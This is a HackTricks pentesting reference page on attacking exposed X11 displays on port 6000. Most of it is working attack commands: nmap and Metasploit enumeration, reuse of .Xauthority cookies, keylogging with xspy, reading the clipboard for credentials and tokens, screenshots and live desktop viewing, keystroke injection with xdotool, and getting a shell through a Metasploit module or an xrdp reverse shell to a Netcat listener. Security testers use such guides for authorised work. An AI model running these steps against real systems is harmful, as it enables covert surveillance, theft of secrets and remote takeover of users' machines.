6000-pentesting-x11.md (8291B)
1 --- 2 title: "6000 - Pentesting X11" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/6000-pentesting-x11.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/6000-pentesting-x11.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # 6000 - Pentesting X11 14 15 ## Basic Information 16 17 **X Window System** (X/X11) is a windowing system used on UNIX-like operating systems. If you can **connect to a display** and present a valid authorization token, you usually gain access to much more than graphics: **window enumeration, clipboard access, screenshots, input sniffing, and input injection** are common post-connection primitives.<sup>[[7]](#references)</sup> 18 19 **Default port:** 6000 20 21 ```text 22 PORT STATE SERVICE 23 6000/tcp open X11 24 ``` 25 26 A display number usually maps to **TCP `6000 + <display>`** and to the local **Unix-domain socket** **`/tmp/.X11-unix/X<display>`**. Modern X servers may disable TCP listening, so an absent TCP port does not rule out a locally reachable display.<sup>[[6]](#references)</sup> 27 28 ## Enumeration 29 30 Check for **anonymous connection**: 31 32 ```bash 33 nmap -sV --script x11-access -p <PORT> <IP> 34 msf> use auxiliary/scanner/x11/open_x11 35 ``` 36 37 If a server is not listening on TCP, remember that a **local foothold** plus a valid **cookie** is still often enough to abuse the **Unix-domain socket**. 38 39 #### Local Enumeration 40 41 The file **`.Xauthority`** in the user's home directory is used by X11 clients to locate authorization records.<sup>[[1]](#references)</sup><sup>[[3]](#references)</sup> The following example illustrates its binary `MIT-MAGIC-COOKIE-1` record: 42 43 ```bash 44 $ xxd ~/.Xauthority 45 00000000: 0100 0006 6d61 6e65 7063 0001 3000 124d ............0..M 46 00000010: 4954 2d4d 4147 4943 2d43 4f4f 4b49 452d IT-MAGIC-COOKIE- 47 00000020: 3100 108f 52b9 7ea8 f041 c49b 85d8 8f58 1...R.~..A.....X 48 00000030: 041d ef ... 49 ``` 50 51 > MIT-magic-cookie-1: Generating 128bit of key (“cookie”), storing it in \~/.Xauthority (or where XAUTHORITY envvar points to). The client sends it to server plain! the server checks whether it has a copy of this “cookie” and if so, the connection is permitted. the key is generated by DMX. 52 53 > [!WARNING] 54 > In order to **use the cookie** you should set the env var: **`export XAUTHORITY=/path/to/.Xauthority`** 55 56 Useful local triage: 57 58 ```bash 59 echo "$DISPLAY" 60 ls -lah /tmp/.X11-unix/ 61 ps -efww | grep -E '[X]org|[X]wayland' 62 xauth info 63 xauth list 64 ``` 65 66 If you already have code execution as another user, check the environment of GUI-related processes for **`DISPLAY`** and **`XAUTHORITY`**. If you need a refresher on `DISPLAY`, see [Linux environment variables](/hacktricks/linux-hardening/linux-basics/linux-environment-variables). 67 68 The X server process may also expose the **authoritative authorization file** through the `-auth` argument, so it is worth checking the full command line of `Xorg`/`Xwayland`.<sup>[[6]](#references)</sup> 69 70 #### Local Enumeration Session 71 72 ```bash 73 $ w 74 23:50:48 up 1 day, 10:32, 1 user, load average: 0.29, 6.48, 7.12 75 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT 76 user tty7 :0 13Oct23 76days 13:37 2.20s xfce4-session 77 ``` 78 79 In the example, `localhost:0` was running `xfce4-session`. 80 81 ## Verify Connection 82 83 ```bash 84 xdpyinfo -display <IP>:<display> 85 xwininfo -root -tree -display <IP>:<display> # Ex: xwininfo -root -tree -display 10.5.5.12:0 86 ``` 87 88 Useful follow-up enumeration once connected: 89 90 ```bash 91 xlsclients -display <IP>:<display> 92 xprop -root _NET_ACTIVE_WINDOW -display <IP>:<display> 93 xinput --list --display <IP>:<display> 94 ``` 95 96 ## Keylogging 97 98 [xspy] can monitor keystrokes sent through an accessible X11 display.<sup>[[8]](#references)</sup> 99 100 Sample output: 101 102 ```text 103 xspy 10.9.xx.xx 104 105 opened 10.9.xx.xx:0 for snoopng 106 swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123 107 qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab 108 ``` 109 110 You can also inspect input devices and monitor events with the X Input extension: 111 112 ```bash 113 xinput --list --display <IP>:<display> 114 xinput --test_xi2 --display <IP>:<display> 115 ``` 116 117 ## Clipboard Access 118 119 Once authenticated, reading the clipboard is usually trivial: 120 121 ```bash 122 xclip -display <IP>:<display> -selection clipboard -o 123 xclip -display <IP>:<display> -selection primary -o 124 xsel --display <IP>:<display> --clipboard --output 125 ``` 126 127 This is useful for **credentials**, **API tokens**, copied **SSH keys**, password-manager pastes, and other short-lived secrets. 128 129 ## Screenshot Capturing 130 131 ```bash 132 xwd -root -screen -silent -display <TargetIP:0> > screenshot.xwd 133 convert screenshot.xwd screenshot.png 134 ``` 135 136 ## Remote Desktop View 137 138 The following `xrdp.py` workflow comes from the unauthenticated-X11 walkthrough in reference 4.<sup>[[4]](#references)</sup> 139 140 ```bash 141 ./xrdp.py <IP:0> 142 ``` 143 144 The following `xwininfo`/`xwatchwin` workflow comes from reference 5.<sup>[[5]](#references)</sup> 145 146 First we need to find the ID of the window using `xwininfo`: 147 148 ```text 149 xwininfo -root -display 10.9.xx.xx:0 150 151 xwininfo: Window id: 0x45 (the root window) (has no name) 152 153 Absolute upper-left X: 0 154 Absolute upper-left Y: 0 155 Relative upper-left X: 0 156 Relative upper-left Y: 0 157 Width: 1024 158 Height: 768 159 Depth: 16 160 Visual: 0x21 161 Visual Class: TrueColor 162 Border width: 0 163 Class: InputOutput 164 Colormap: 0x20 (installed) 165 Bit Gravity State: ForgetGravity 166 Window Gravity State: NorthWestGravity 167 Backing Store State: NotUseful 168 Save Under State: no 169 Map State: IsViewable 170 Override Redirect State: no 171 Corners: +0+0 -0+0 -0-0 +0-0 172 -geometry 1024x768+0+0 173 ``` 174 175 **XWatchwin** 176 177 For **live viewing** use: 178 179 ```bash 180 ./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } # -w windowID is the one found with xwininfo 181 ./xwatchwin 10.9.xx.xx:0 -w 0x45 182 ``` 183 184 A more maintained alternative for shadowing an existing X11 display is `xpra`:<sup>[[2]](#references)</sup> 185 186 ```bash 187 xpra shadow :0 188 xpra attach ssh:<user>@<host>:0 189 ``` 190 191 ## Input Injection / UI Abuse 192 193 Authenticated X11 access is not limited to observation. You can usually **activate windows**, **type**, and **send key presses**: 194 195 ```bash 196 WID=$(xdotool search --onlyvisible --name '.*' | head -n 1) 197 xdotool windowactivate --sync "$WID" 198 xdotool type --delay 50 'touch /tmp/.x11-pwned' 199 xdotool key Return 200 ``` 201 202 If you target a specific window with `xdotool type --window ...`, many applications will ignore the event because it is delivered with `XSendEvent`. Activating the target window first and then using normal keyboard injection is often more reliable. 203 204 ## Get Shell 205 206 ```text 207 msf> use exploit/unix/x11/x11_keyboard_exec 208 ``` 209 210 Another approach: 211 212 **Reverse Shell:** `xrdp` also allows taking a reverse shell via Netcat.<sup>[[4]](#references)</sup> Type the following command: 213 214 ```bash 215 ./xrdp.py <IP:0> --no-disp 216 ``` 217 218 In the interface you can see the **R-shell** option. 219 220 Then, start a **Netcat listener** in your local system on port `5555`. 221 222 ```bash 223 nc -lvp 5555 224 ``` 225 226 Then, put your IP address and port in the **R-Shell** option and click on **R-shell** to get a shell. 227 228 ## Shodan 229 230 - `port:6000 x11` 231 232 ## References 233 234 - [1] [X.Org `xauth` manual](https://www.x.org/releases/X11R7.7/doc/man/man1/xauth.1.xhtml) 235 - [2] [Xpra manual](https://xpra.org/manual) 236 - [3] [How X11 authorization works (.Xauthority / MIT-MAGIC-COOKIE) - Stack Overflow](https://stackoverflow.com/a/37367518) 237 - [4] [Exploiting X11 Unauthenticated Access - Infosec Institute (archived)](https://web.archive.org/web/20250604035102id_/https://www.infosecinstitute.com/resources/hacking/exploiting-x11-unauthenticated-access/) 238 - [5] [Vulnerability Analysis (LFF-IPS Part 2) - bitvijays (archived)](https://web.archive.org/web/20240000000000id_/https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html) 239 - [6] [X.Org Xserver manual](https://www.x.org/releases/current/doc/man/man1/Xserver.1.xhtml) 240 - [7] [X.Org Xsecurity manual](https://www.x.org/releases/current/doc/man/man7/Xsecurity.7.xhtml) 241 - [8] [Kali Linux Tools: xspy](https://www.kali.org/tools/xspy/)